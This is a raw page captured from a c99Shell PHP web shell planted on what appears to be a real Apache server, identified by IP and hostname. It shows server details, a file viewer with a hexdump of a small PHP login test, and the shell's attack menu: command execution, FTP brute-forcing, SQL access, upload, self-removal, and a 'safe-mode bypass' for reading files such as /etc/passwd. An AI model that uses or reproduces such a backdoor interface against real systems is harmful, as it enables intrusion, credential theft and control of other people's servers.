110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x Free 52.81 GB of 127.8 GB (41.32%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/ drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.32%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: Noname1.php (472 B) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/manage/Noname1.php
Size	472 B
MD5	2cfc1b80ba81c34d376568f9a4eed442
Owner/Group	apache/apache
Perms	-rw-r--r--
Create time	03/07/2013 18:31:17
Access time	06/07/2024 18:21:12
MODIFY time	29/03/2004 14:22:00

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8

3C 3F 70 68 70 0D 0A 24 61 20 3D 22 31 32 33 34 22 3B 0D 0A 24 61 20 3D
20 6D 64 35 28 24 61 29 3B 0D 0A 20 20 65 63 68 6F 20 22 24 61 22 3B 0D
0A 20 20 2F 2A 73 65 73 73 69 6F 6E 5F 72 65 67 69 73 74 65 72 20 28 22
6C 6F 67 67 65 64 5F 69 6E 22 29 3B 0D 0A 20 20 69 66 20 28 21 73 74 72
63 6D 70 28 24 75 73 65 72 2C 20 22 75 73 65 72 22 29 20 26 26 20 21 73
74 72 63 6D 70 28 24 70 61 73 73 2C 20 22 70 61 73 73 77 6F 72 64 22 29
29 0D 0A 20 20 20 24 6C 6F 67 67 65 64 5F 69 6E 20 3D 20 31 3B 0D 0A 0D
0A 20 20 69 66 20 28 24 6C 6F 67 6F 75 74 29 0D 0A 20 20 20 24 6C 6F 67
67 65 64 5F 69 6E 20 3D 20 30 3B 0D 0A 0D 0A 20 20 69 66 20 28 24 5F 73
65 73 73 69 6F 6E 5B 6C 6F 67 67 65 64 5F 69 6E 5D 29 20 0D 0A 20 20 20
65 63 68 6F 20 22 6C 6F 67 67 65 64 20 69 6E 2E 20 3C 41 20 68 72 65 66
3D 5C 22 73 65 73 74 65 73 74 2E 70 68 70 3F 6C 6F 67 6F 75 74 3D 31 5C
22 3E 6C 6F 67 20 6F 75 74 3C 2F 41 3E 22 3B 0D 0A 20 20 65 6C 73 65 0D
0A 20 20 20 65 63 68 6F 20 22 3C 46 4F 52 4D 20 61 63 74 69 6F 6E 3D 73
65 73 74 65 73 74 2E 70 68 70 20 6D 65 74 68 6F 64 3D 67 65 74 3E 55 73
65 72 3A 20 3C 49 4E 50 55 54 20 74 79 70 65 3D 74 65 78 74 20 6E 61 6D
65 3D 75 73 65 72 3E 3C 42 52 3E 50 61 73 73 77 6F 72 64 3A 20 3C 49 4E
50 55 54 20 74 79 70 65 3D 74 65 78 74 20 6E 61 6D 65 3D 70 61 73 73 3E
3C 42 52 3E 3C 49 4E 50 55 54 20 74 79 70 65 3D 73 75 62 6D 69 74 3E 3C
2F 46 4F 52 4D 3E 22 3B 2A 2F 0D 0A 3F 3E 0D 0A

<?php  $a ="1234";  $a =
md5($a);    echo "$a";
   /*session_register ("
logged_in");    if (!str
cmp($user, "user") && !s
trcmp($pass, "password")
)     $logged_in = 1;
   if ($logout)     $log
ged_in = 0;      if ($_s
ession[logged_in])
echo "logged in. <A href
=\"sestest.php?logout=1\
">log out</A>";    else
    echo "<FORM action=s
estest.php method=get>Us
er: <INPUT type=text nam
e=user><BR>Password: <IN
PUT type=text name=pass>
<BR><INPUT type=submit><
/FORM>";*/  ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0073 ]--